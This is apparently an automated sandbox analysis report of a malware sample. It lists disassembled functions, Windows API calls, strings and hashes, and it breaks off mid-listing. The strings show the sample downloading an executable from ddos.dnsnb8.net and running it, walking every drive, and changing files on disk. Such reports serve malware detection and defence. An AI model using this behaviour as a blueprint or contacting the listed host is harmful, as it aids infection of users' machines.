Function 0096D88E Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE

Download Yara Rule

APIs

WriteConsoleW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,0096C7C8,00000000,00000001,00000000,00000000,?,00965973,00000000,00000000,00000000), ref: 0096D8A5
GetLastError.KERNEL32(?,0096C7C8,00000000,00000001,00000000,00000000,?,00965973,00000000,00000000,00000000,00000000,00000000,?,00965EFA,?), ref: 0096D8B1

Part of subcall function 0096D877: CloseHandle.KERNEL32(FFFFFFFE,0096D8C1,?,0096C7C8,00000000,00000001,00000000,00000000,?,00965973,00000000,00000000,00000000,00000000,00000000), ref: 0096D887

___initconout.LIBCMT ref: 0096D8C1

Part of subcall function 0096D839: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,0096D868,0096C7B5,00000000,?,00965973,00000000,00000000,00000000,00000000), ref: 0096D84C

WriteConsoleW.KERNEL32(00000000,00000000,00000000,00000000,?,0096C7C8,00000000,00000001,00000000,00000000,?,00965973,00000000,00000000,00000000,00000000), ref: 0096D8D6

Memory Dump Source

Source File: 00000000.00000002.1832558573.0000000000951000.00000020.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true

Associated: 00000000.00000002.1832534038.0000000000950000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832599610.0000000000970000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832624318.000000000097B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832685375.00000000009F8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832706458.00000000009F9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832726530.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832778238.00000000009FB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832802341.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832842313.00000000009FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832858390.0000000000A00000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832858390.0000000000A04000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_950000_1hdqYXYJkr.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
String ID:
API String ID: 2744216297-0
Opcode ID: a25c47f5693d86e9e2838397c77e7bca3537ecbf9208fd89a61c5a2f22969f41
Instruction ID: 460f1d8c2eb831e24a886ee62fea5bf3f745ff26bd6ac7d229783127164aec27
Opcode Fuzzy Hash: a25c47f5693d86e9e2838397c77e7bca3537ecbf9208fd89a61c5a2f22969f41
Instruction Fuzzy Hash: F2F0AC36925114BBCF222FA5DC08B9D7F66FB893A1F054010FA1DD6160DA328860EB90

Function 0095C0E7 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112COMMONLIBRARYCODE

Download Yara Rule

APIs

EncodePointer.KERNEL32(00000000,?), ref: 0095C10C

Strings

MOC, xrefs: 0095C11E
RCC, xrefs: 0095C126

Memory Dump Source

Source File: 00000000.00000002.1832558573.0000000000951000.00000020.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true

Associated: 00000000.00000002.1832534038.0000000000950000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832599610.0000000000970000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832624318.000000000097B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832685375.00000000009F8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832706458.00000000009F9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832726530.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832778238.00000000009FB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832802341.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832842313.00000000009FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832858390.0000000000A00000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832858390.0000000000A04000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_950000_1hdqYXYJkr.jbxd

Similarity

API ID: EncodePointer
String ID: MOC$RCC
API String ID: 2118026453-2084237596
Opcode ID: 7ea4d9f812c7b76be2f9da27f8768a3e838252cc7da4efe6b540e68777a9d36e
Instruction ID: a51d79c4dbc9c1738afafb8239cf6e3f41470145bc396c7a9cc4d7a8221753e1
Opcode Fuzzy Hash: 7ea4d9f812c7b76be2f9da27f8768a3e838252cc7da4efe6b540e68777a9d36e
Instruction Fuzzy Hash: 494178B2900209AFCF16DF99CC81AAEBBB9BF48305F148058FE04A7252D335A954DF60

Function 00955FA3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 73COMMON

Download Yara Rule

APIs

__alloca_probe_16.LIBCMT ref: 0095602B
RaiseException.KERNEL32(?,?,?,009551E7,?,?,?,?,?,?,?,?,?,?,009551E7,00000001), ref: 00956050

Part of subcall function 009599C2: RaiseException.KERNEL32(E06D7363,00000001,00000003,?,00000000,?,?,00955558,?,00979208,00951E83,?,00951E83), ref: 00959A22

Part of subcall function 0095D05B: IsProcessorFeaturePresent.KERNEL32(00000017,00951E5A,?,?,?,00953CB9,009FA41C,?,?,009529CB,?,?,?,?,?,0095139A), ref: 0095D077

Strings

csm, xrefs: 00955FDF

Memory Dump Source

Source File: 00000000.00000002.1832558573.0000000000951000.00000020.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true

Associated: 00000000.00000002.1832534038.0000000000950000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832599610.0000000000970000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832624318.000000000097B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832685375.00000000009F8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832706458.00000000009F9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832726530.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832778238.00000000009FB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832802341.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832842313.00000000009FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832858390.0000000000A00000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832858390.0000000000A04000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_950000_1hdqYXYJkr.jbxd

Similarity

API ID: ExceptionRaise$FeaturePresentProcessor__alloca_probe_16
String ID: csm
API String ID: 1924019822-1018135373
Opcode ID: bb8b9ad697d0962252fc0d170984542be77fba9e032476326a2a7d3ca123c1ac
Instruction ID: 298a434f1a06b1786ca6c8cd7479777f64796432a75da2d8a7304e7cfecf6749
Opcode Fuzzy Hash: bb8b9ad697d0962252fc0d170984542be77fba9e032476326a2a7d3ca123c1ac
Instruction Fuzzy Hash: 63218332D00218DBCF35DFA7D845AAEB7B9EF44712F940409EC06AB191DB70AD49CB91

Function 0095243C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 33COMMONLIBRARYCODE

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00952443
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0095247B

Part of subcall function 009566DD: _Yarn.LIBCPMT ref: 009566FC
Part of subcall function 009566DD: _Yarn.LIBCPMT ref: 00956720

Strings

bad locale name, xrefs: 00952489

Memory Dump Source

Source File: 00000000.00000002.1832558573.0000000000951000.00000020.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true

Associated: 00000000.00000002.1832534038.0000000000950000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832599610.0000000000970000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832624318.000000000097B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832685375.00000000009F8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832706458.00000000009F9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832726530.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832778238.00000000009FB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832802341.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832842313.00000000009FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832858390.0000000000A00000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832858390.0000000000A04000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_950000_1hdqYXYJkr.jbxd

Similarity

API ID: Yarnstd::_$Locinfo::_Locinfo_ctorLockitLockit::_
String ID: bad locale name
API String ID: 1908188788-1405518554
Opcode ID: 3a8b443b619068a94765a652bb179746a53c05288b7b42643f913412d945c21b
Instruction ID: b0d6d6562faae2bcff52c71bb9dd091c33a52e01c4e78e7f12755b4575d13962
Opcode Fuzzy Hash: 3a8b443b619068a94765a652bb179746a53c05288b7b42643f913412d945c21b
Instruction Fuzzy Hash: BCF01D71505B409E8330DF6B9481547FBE4BE69251390CA2EE0DEC3A12D770A408CBA9

Function 0096122F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 6COMMON

Download Yara Rule

APIs

GetCommandLineA.KERNEL32 ref: 0096122F
GetCommandLineW.KERNEL32 ref: 0096123A

Strings

$G, xrefs: 00961235

Memory Dump Source

Source File: 00000000.00000002.1832558573.0000000000951000.00000020.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true

Associated: 00000000.00000002.1832534038.0000000000950000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832599610.0000000000970000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832624318.000000000097B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832685375.00000000009F8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832706458.00000000009F9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832726530.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832778238.00000000009FB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832802341.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832842313.00000000009FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832858390.0000000000A00000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832858390.0000000000A04000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_950000_1hdqYXYJkr.jbxd

Similarity

API ID: CommandLine
String ID: $G
API String ID: 3253501508-4251033865
Opcode ID: a70cad76b5bc37b2ec6c10505b8969b43a7d1cf4ad838dfc3594472f89e3520c
Instruction ID: 7872f66fac3b04cd2a22d095b117a7c41c2b74cde29437864b472fd015211420
Opcode Fuzzy Hash: a70cad76b5bc37b2ec6c10505b8969b43a7d1cf4ad838dfc3594472f89e3520c
Instruction Fuzzy Hash: F1B092F9878201CFC7018F30B80C3143BA0B2882123800055D80DCA320E7342082FF41

Analysis Process: oQmD.exePID: 6316, Parent PID: 7044COMMON

Execution Graph

Execution Coverage:	32.2%
Dynamic/Decrypted Code Coverage:	10.4%
Signature Coverage:	14.5%
Total number of Nodes:	297
Total number of Limit Nodes:	12

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 008029E2 Relevance: 31.6, APIs: 15, Strings: 3, Instructions: 128
stringfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 00802A02
wsprintfA.USER32 ref: 00802A1A
memset.MSVCRT ref: 00802A44
lstrlen.KERNEL32(?), ref: 00802A54
lstrcpyn.KERNEL32(?,?,-00000001), ref: 00802A6C
strrchr.MSVCRT ref: 00802A7C
lstrcmpiA.KERNEL32(?,Documents and Settings), ref: 00802A9F
lstrlen.KERNEL32(Documents and Settings), ref: 00802AAE
memset.MSVCRT ref: 00802AC6
memset.MSVCRT ref: 00802ADA
FindFirstFileA.KERNEL32(?,?), ref: 00802AEF
memset.MSVCRT ref: 00802B13
lstrcmpiA.KERNEL32(?,?), ref: 00802B42
FindNextFileA.KERNEL32(00000000,?,?,?,?), ref: 00802B67
FindClose.KERNEL32(00000000), ref: 00802B6E

Strings

Documents and Settings, xrefs: 00802A8D, 00802A92, 00802A9A, 00802AAD
C:\, xrefs: 00802A2F
%s*, xrefs: 00802A14

Memory Dump Source

Source File: 00000002.00000002.1844077866.0000000000801000.00000020.00000001.01000000.00000004.sdmp, Offset: 00800000, based on PE: true

Associated: 00000002.00000002.1844064525.0000000000800000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1844091326.0000000000803000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1844104346.0000000000804000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1844117999.0000000000806000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_800000_oQmD.jbxd

Similarity

API ID: memset$Find$Filelstrcmpilstrlen$CloseFirstNextlstrcpynstrrchrwsprintf
String ID: %s*$C:\$Documents and Settings
API String ID: 2826467728-110786608
Opcode ID: 42210977e343303e16639e0c40cb112193b02afc259adea6f8058cc3a958a55d
Instruction ID: 6725396e545db62392fd60b62b520ac5061e9a8efcc3db9d027dbaf1795e04dd
Opcode Fuzzy Hash: 42210977e343303e16639e0c40cb112193b02afc259adea6f8058cc3a958a55d
Instruction Fuzzy Hash: C941A2B2805749AFD761EBA0DC8CDEB77ECFB84315F04092AF944C3051E674D6488BA2

Function 00801099 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 74
stringsleepprocessCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0080185B: GetSystemTimeAsFileTime.KERNEL32(?,ddos.dnsnb8.net,75BF8400,http://%s:%d/%s/%s,?,?,?,00801118), ref: 00801867
Part of subcall function 0080185B: srand.MSVCRT ref: 00801878
Part of subcall function 0080185B: rand.MSVCRT ref: 00801880
Part of subcall function 0080185B: srand.MSVCRT ref: 00801890
Part of subcall function 0080185B: rand.MSVCRT ref: 00801894

WinExec.KERNEL32(?,00000005), ref: 008010F1
lstrlen.KERNEL32(00804748), ref: 008010FA
wsprintfA.USER32 ref: 0080112A
wsprintfA.USER32 ref: 00801143
URLDownloadToFileA.URLMON(00000000,?,?,00000000,00000000), ref: 0080115B
lstrlen.KERNEL32(ddos.dnsnb8.net,00000000,?,?,00000000,00000000), ref: 00801169
Sleep.KERNEL32 ref: 00801179

Strings

cj/, xrefs: 00801135
%s%.8X.exe, xrefs: 00801124
C:\Users\user\AppData\Local\Temp\, xrefs: 00801119
http://%s:%d/%s/%s, xrefs: 008010C2, 00801141
ddos.dnsnb8.net, xrefs: 008010C8, 008010CF, 00801140, 00801168

Memory Dump Source

Source File: 00000002.00000002.1844077866.0000000000801000.00000020.00000001.01000000.00000004.sdmp, Offset: 00800000, based on PE: true

Associated: 00000002.00000002.1844064525.0000000000800000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1844091326.0000000000803000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1844104346.0000000000804000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1844117999.0000000000806000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_800000_oQmD.jbxd

Similarity

API ID: FileTimelstrlenrandsrandwsprintf$DownloadExecSleepSystem
String ID: %s%.8X.exe$C:\Users\user\AppData\Local\Temp\$cj/$ddos.dnsnb8.net$http://%s:%d/%s/%s
API String ID: 1280626985-3050893656
Opcode ID: 29c2ee95ad49d88ff1584744156b9cc45c26491eadd4f1ea918c037ad6e0f04a
Instruction ID: 00293a0c647b865e382daf0cf483ac2c759649f3c309850533a7c5ac4f44c6da
Opcode Fuzzy Hash: 29c2ee95ad49d88ff1584744156b9cc45c26491eadd4f1ea918c037ad6e0f04a
Instruction Fuzzy Hash: AD215EB6941208BEDFA0DBA0DC49FAEBBBCFB15325F1151A5E600E2190D7749B84CF61

Function 00801718 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 65
timeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemTimeAsFileTime.KERNEL32(?,?,00000104,C:\Users\user\AppData\Local\Temp\oQmD.exe), ref: 00801729
SHSetValueA.SHLWAPI(80000002,SOFTWARE\GTplus,Time,00000003,?,00000008), ref: 0080174C
SHGetValueA.SHLWAPI(80000002,SOFTWARE\GTplus,Time,?,?,00000001), ref: 0080177C
__aulldiv.LIBCMT ref: 00801796
__aulldiv.LIBCMT ref: 008017A8

Strings

C:\Users\user\AppData\Local\Temp\oQmD.exe, xrefs: 00801722
Time, xrefs: 0080173D, 00801766
SOFTWARE\GTplus, xrefs: 00801742, 0080176B

Memory Dump Source

Source File: 00000002.00000002.1844077866.0000000000801000.00000020.00000001.01000000.00000004.sdmp, Offset: 00800000, based on PE: true

Associated: 00000002.00000002.1844064525.0000000000800000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1844091326.0000000000803000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1844104346.0000000000804000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1844117999.0000000000806000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_800000_oQmD.jbxd

Similarity

API ID: TimeValue__aulldiv$FileSystem
String ID: C:\Users\user\AppData\Local\Temp\oQmD.exe$SOFTWARE\GTplus$Time
API String ID: 541852442-4019655368
Opcode ID: 04c363e130fb06d39672ea7160ec2f2476bf3e90b15f2714aa3c28d9fdb118e9
Instruction ID: a94196d05f71e845c1ecf9affe5713ed58c074a725306462521eb89039eb4d0b
Opcode Fuzzy Hash: 04c363e130fb06d39672ea7160ec2f2476bf3e90b15f2714aa3c28d9fdb118e9
Instruction Fuzzy Hash: DD116371A00209BBEF609B94CC89FEF7BBCFB44B24F108115FA10F62C5D6B59A448B60

Function 00806076 Relevance: 11.1, APIs: 7, Instructions: 615
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNEL32(00000000,00001800,00001000,00000004), ref: 008060BE
VirtualAlloc.KERNEL32(00000000,?,00001000,00000004,?,?,?), ref: 008060DF
VirtualFree.KERNELBASE(?,00000000,00008000,?,?,?), ref: 00806189
VirtualFree.KERNELBASE(?,00000000,00008000), ref: 008061A5

Memory Dump Source

Source File: 00000002.00000002.1844117999.0000000000806000.00000040.00000001.01000000.00000004.sdmp, Offset: 00800000, based on PE: true

Associated: 00000002.00000002.1844064525.0000000000800000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1844077866.0000000000801000.00000020.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1844091326.0000000000803000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1844104346.0000000000804000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_800000_oQmD.jbxd

Similarity

API ID: Virtual$AllocFree
String ID:
API String ID: 2087232378-0
Opcode ID: 1c5189ce20b561600f2114994692c26fd9f3ae4f2bc5cde4026f333bae989aae
Instruction ID: 9ac0188ffbcae5a667077d3a98a4661f0f709efa32e6c3d918a57d0d8227093e
Opcode Fuzzy Hash: 1c5189ce20b561600f2114994692c26fd9f3ae4f2bc5cde4026f333bae989aae
Instruction Fuzzy Hash: B61212B25087898FDB728F24CC55BEA3BA0FF02314F1845ADE885CB2D2E674A931C755

Function 00802B8C Relevance: 10.6, APIs: 7, Instructions: 74
threadstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 00802BA6
GetLogicalDriveStringsA.KERNEL32(00000050,?), ref: 00802BB4
GetDriveTypeA.KERNEL32(?), ref: 00802BD3
CreateThread.KERNEL32(00000000,00000000,00802B7D,?,00000000,00000000), ref: 00802BEE
lstrlen.KERNEL32(?), ref: 00802BFB
WaitForMultipleObjects.KERNEL32(?,?,00000001,000000FF), ref: 00802C16
CreateThread.KERNEL32(00000000,00000000,00802845,00000000,00000000,00000000), ref: 00802C3A

Memory Dump Source

Source File: 00000002.00000002.1844077866.0000000000801000.00000020.00000001.01000000.00000004.sdmp, Offset: 00800000, based on PE: true

Associated: 00000002.00000002.1844064525.0000000000800000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1844091326.0000000000803000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1844104346.0000000000804000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1844117999.0000000000806000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_800000_oQmD.jbxd

Similarity

API ID: CreateDriveThread$LogicalMultipleObjectsStringsTypeWaitlstrlenmemset
String ID:
API String ID: 1073171358-0
Opcode ID: d7f2e74ff702abc48b9ee1c5dd102e1ff8086c9e9f45b92a886a4a954a3ffc48
Instruction ID: 599defc15dd5c192a67ac296d0e951b5ba9cd11033759b0e6f5517fcbe23088e
Opcode Fuzzy Hash: d7f2e74ff702abc48b9ee1c5dd102e1ff8086c9e9f45b92a886a4a954a3ffc48
Instruction Fuzzy Hash: 5721E7F184015CEFE7B09F649C88DAE7B6DFF04364B140125F992E2191D7B48D06CB61

Function 00801E6E Relevance: 30.4, APIs: 20, Instructions: 380
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetFileAttributesA.KERNEL32(?,00000080,?,008032B0,00000164,00802986,?), ref: 00801EB9
CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000003,00000080,00000000), ref: 00801ECD
SetFilePointer.KERNEL32(000000FF,00000000,00000000,00000002,00000000,00000000), ref: 00801EF3
CreateFileMappingA.KERNEL32(000000FF,00000000,00000004,00000000,00000000,00000000), ref: 00801F07
MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00000400), ref: 00801F1D
FlushViewOfFile.KERNEL32(?,00000400,?,00000000,00000000,?,00000000,00000002), ref: 0080201E
memset.MSVCRT ref: 008020D8
memset.MSVCRT ref: 008020EA
memcpy.MSVCRT ref: 0080222D
UnmapViewOfFile.KERNEL32(?,?,00000002,?,?,?,?,00000000,00000000,?,00000000,00000002), ref: 00802238
CloseHandle.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00000002), ref: 0080224A
SetFilePointer.KERNEL32(000000FF,?,00000000,00000002,?,?,?,?,00000000,00000000,?,00000000,00000002), ref: 008022C6
SetEndOfFile.KERNEL32(000000FF,?,?,?,00000000,00000000,?,00000000,00000002), ref: 008022CB
SetFilePointer.KERNEL32(000000FF,?,00000000,00000002,?,?,?,00000000,00000000,?,00000000,00000002), ref: 008022DD
WriteFile.KERNEL32(000000FF,00804008,00000271,?,00000000,?,?,?,00000000,00000000,?,00000000,00000002), ref: 008022F7
WriteFile.KERNEL32(000000FF,?,00000000,?,?,?,00000000,00000000,?,00000000,00000002), ref: 0080230D
FindCloseChangeNotification.KERNEL32(000000FF,000000FF,00000001,?,?,?,00000000,00000000,?,00000000,00000002), ref: 00802322
UnmapViewOfFile.KERNEL32(?,?,008032B0,00000164,00802986,?), ref: 00802340
FindCloseChangeNotification.KERNEL32(?,?,008032B0,00000164,00802986,?), ref: 0080234E
CloseHandle.KERNEL32(000000FF,?,008032B0,00000164,00802986,?), ref: 00802359

Memory Dump Source

Source File: 00000002.00000002.1844077866.0000000000801000.00000020.00000001.01000000.00000004.sdmp, Offset: 00800000, based on PE: true

Associated: 00000002.00000002.1844064525.0000000000800000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1844091326.0000000000803000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1844104346.0000000000804000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1844117999.0000000000806000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_800000_oQmD.jbxd

Similarity

API ID: File$CloseView$Pointer$ChangeCreateFindHandleNotificationUnmapWritememset$AttributesFlushMappingmemcpy
String ID:
API String ID: 3349749541-0
Opcode ID: 5f4d7386385d2ea325f3c77fae699d525911987bd164f1567da19295e057e201
Instruction ID: 5a76099ba27d6872c86009d0e2581171c704077d0306aa04ffbb90881abb5b40
Opcode Fuzzy Hash: 5f4d7386385d2ea325f3c77fae699d525911987bd164f1567da19295e057e201
Instruction Fuzzy Hash: A5F15B71900608EFDBA0DFA8DC89AADBBB5FF08314F10452AE919E76A1D770AD51CF50

Function 00801973 Relevance: 28.1, APIs: 12, Strings: 4, Instructions: 144
filesleepmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PathFileExistsA.SHLWAPI(00804E5C,00000000,C:\Users\user\AppData\Local\Temp\oQmD.exe), ref: 00801992
CreateFileA.KERNEL32(00804E5C,80000000,00000001,00000000,00000003,00000000,00000000,00000000), ref: 008019BA
Sleep.KERNEL32(00000064), ref: 008019C6
wsprintfA.USER32 ref: 008019EC
CopyFileA.KERNEL32(00804E5C,?,00000000), ref: 00801A00
CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00801A1E
GetFileSize.KERNEL32(00804E5C,00000000), ref: 00801A2C
VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 00801A46
ReadFile.KERNEL32(00804E5C,00804E60,00000000,?,00000000), ref: 00801A65
FindCloseChangeNotification.KERNEL32(000000FF), ref: 00801A90
DeleteFileA.KERNEL32(?), ref: 00801AA7
VirtualFree.KERNEL32(00804E60,00000000,00008000), ref: 00801AC1

Strings

C:\Users\user\AppData\Local\Temp\oQmD.exe, xrefs: 0080197C
C:\Users\user\AppData\Local\Temp\, xrefs: 008019DB
%s%.8X.data, xrefs: 008019E6
2, xrefs: 008019CF

Memory Dump Source

Source File: 00000002.00000002.1844077866.0000000000801000.00000020.00000001.01000000.00000004.sdmp, Offset: 00800000, based on PE: true

Associated: 00000002.00000002.1844064525.0000000000800000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1844091326.0000000000803000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1844104346.0000000000804000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1844117999.0000000000806000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_800000_oQmD.jbxd

Similarity

API ID: File$CreateVirtual$AllocChangeCloseCopyDeleteExistsFindFreeNotificationPathReadSizeSleepwsprintf
String ID: %s%.8X.data$2$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\oQmD.exe
API String ID: 2523042076-4229179040
Opcode ID: 421eb7d30c9dd51f5bc5579603ad74f32eeb1bb8fb63c6f122dc8aefa2849150
Instruction ID: 5a0b6624a95bee8aa9fe7ce722e6ee8c75bc70587f1a1fd3997f976a4cd49a55
Opcode Fuzzy Hash: 421eb7d30c9dd51f5bc5579603ad74f32eeb1bb8fb63c6f122dc8aefa2849150
Instruction Fuzzy Hash: C8512D71A01229EFDF609F98DC88AAEBBBDFB05364F104569F515E61D0D3709E44CBA0

Function 008028B8 Relevance: 24.6, APIs: 9, Strings: 5, Instructions: 100
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 008028D3
wsprintfA.USER32 ref: 008028F7
memset.MSVCRT ref: 00802925
wsprintfA.USER32 ref: 00802940

Part of subcall function 008029E2: memset.MSVCRT ref: 00802A02
Part of subcall function 008029E2: wsprintfA.USER32 ref: 00802A1A
Part of subcall function 008029E2: memset.MSVCRT ref: 00802A44
Part of subcall function 008029E2: lstrlen.KERNEL32(?), ref: 00802A54
Part of subcall function 008029E2: lstrcpyn.KERNEL32(?,?,-00000001), ref: 00802A6C
Part of subcall function 008029E2: strrchr.MSVCRT ref: 00802A7C
Part of subcall function 008029E2: lstrcmpiA.KERNEL32(?,Documents and Settings), ref: 00802A9F
Part of subcall function 008029E2: lstrlen.KERNEL32(Documents and Settings), ref: 00802AAE
Part of subcall function 008029E2: memset.MSVCRT ref: 00802AC6
